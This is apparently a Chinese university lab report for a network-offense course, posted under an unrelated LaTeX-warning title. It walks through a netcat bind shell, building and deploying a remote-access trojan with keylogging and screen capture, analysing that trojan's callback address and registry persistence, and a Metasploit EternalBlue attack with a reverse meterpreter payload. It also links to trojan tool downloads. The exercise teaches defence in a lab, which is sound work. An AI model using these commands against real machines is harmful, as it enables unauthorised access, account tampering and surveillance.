1. 程式人生 > 其它 >【LaTex】LaTeX Warning: Citation xxx on page xxx undefined on input line xxx

【LaTex】LaTeX Warning: Citation xxx on page xxx undefined on input line xxx

學 號 201821450002

中國人民公安大學

Chinese people’ public security university

網路對抗技術

實驗報告

實驗四

惡意程式碼技術

學生姓名

陳一維

年級

2018級

區隊

18網安5區

指導教師

高見

資訊科技與網路安全學院

2020年12月3日

實驗任務總綱

2020—2021 學年 第 一 學期

一、實驗目的

1.通過對木馬的練習,使讀者理解和掌握木馬傳播和執行的機制;通過手動刪除木馬,掌握檢查木馬和刪除木馬的技巧,學會防禦木馬的相關知識,加深對木馬的安全防範意識。

2.瞭解並熟悉常用的網路攻擊工具,木馬的基本功能;

3.達到鞏固課程知識和實際應用的目的。

二、實驗要求

1.認真閱讀每個實驗內容,需要截圖的題目,需清晰截圖並對截圖進行標註和說明。

2.文件要求結構清晰,圖文表達準確,標註規範。推理內容客觀、合理、邏輯性強。

3.軟體工具可使用NC、MSF等。

4.實驗結束後,保留電子文件。

三、實驗步驟

1.準備

提前做好實驗準備,實驗前應把詳細瞭解實驗目的、實驗要求和實驗內容,熟悉並準備好實驗用的軟體工具,按照實驗內容和要求提前做好實驗內容的準備。

2.實驗環境

描述實驗所使用的硬體和軟體環境(包括各種軟體工具);

開機並啟動軟體office2003或2007、瀏覽器、加解密軟體。

3.實驗過程

1)啟動系統和啟動工具軟體環境。

2)用軟體工具實現實驗內容。

4.實驗報告

按照統一要求的實驗報告格式書寫實驗報告。把按照模板格式編寫的文件嵌入到實驗報告文件中,文件按照規定的書寫格式書寫,表格要有表說圖形要有圖說。

任務一 利用NC控制電腦

NetCat,具有網路軍刀之稱,它小巧精悍且功能強大,說它小巧精悍,是因為他的軟體大小現在已經壓縮到只有十幾KB,而且在功能上絲毫不減。

實驗過程需要兩個同學相互配合完成:

步驟一:

在受害者的機器 (同學A)
輸入下面的命令:
  nc.exe -l -p port -e cmd.exe 進入監聽模式

步驟二:
  在攻擊者的機器.(同學B)
輸入下面的命令:
  nc ip port //連線victim_IP,然後得到一個shell。 (需要截圖)

步驟三:

在shell中,利用net user  xxx 1206 /add ,新增一個使用者,並在受害者的機器中使用 net user 命令進行驗證。(需要截圖)

任務二 利用木馬控制電腦

相關工具:

https://pan.baidu.com/s/1ipOkdU2HTPFtgU6fF669Gg

https://pan.baidu.com/s/1ajmRKsnv5XvFrKWzszDYwQ(備用,另外一個木馬)

實驗過程需要兩個同學配合:

步驟一:

 攻擊者的機器. (同學A)
開啟V2014.exe程式或則star RAT,這兩個木馬功能類似。

步驟二:
  點選選單欄中的“服務生成”,在彈出的配置服務端中,配置回連IP地址(攻擊者IP)和埠號,並點選“生成”按鈕,生成木馬服務端。

步驟三:

將生成的木馬可執行程式拷貝到受害者的機器,並雙擊執行。

步驟四:

在控制端中檢視木馬上線情況,並對以下功能每個進行測試和截圖。

檔案管理,嘗試拷貝檔案

本地:

2.螢幕控制,嘗試獲取桌面

3.鍵盤記錄,嘗試獲取對方擊鍵記錄

4.會話管理,重啟對方機器,檢視是否能自啟動上線

會話管理,解除安裝對方的木馬。



任務三 木馬分析

將任務二中生成的木馬設定具備自刪除功能和自啟動功能,對其進行分析。回答以下問題(截圖證明)(推薦使用“火絨劍”工具)

1.該木馬的回連IP是?172.20.10.8

2.該木馬的回連埠是?2012

3.該木馬自刪除後,會將自身的宿主程式改成什麼名字,並隱藏到系統其它目錄中。

名字改成了svchost.exe,隱藏在C:\WINDOWS\417E3AF1目錄下

4.該木馬依靠什麼方法實現自啟動的,怎麼實現的。

通過登錄檔的方式,詳見上圖Reg Modify

任務四 msf攻擊體驗

sudo netdiscover -r 172.20.10.0/24

開啟msfconsole

搜尋永恆之藍

show options

set Rhost

show options

set Rhost

set payload windows/meterpreter/reverse_http

set Lhost

exploit

原本使用者登入需要輸入密碼

getuid+shell命令

net user 檢視使用者並將改使用者密碼更改為*,即設為無密碼

可直接登入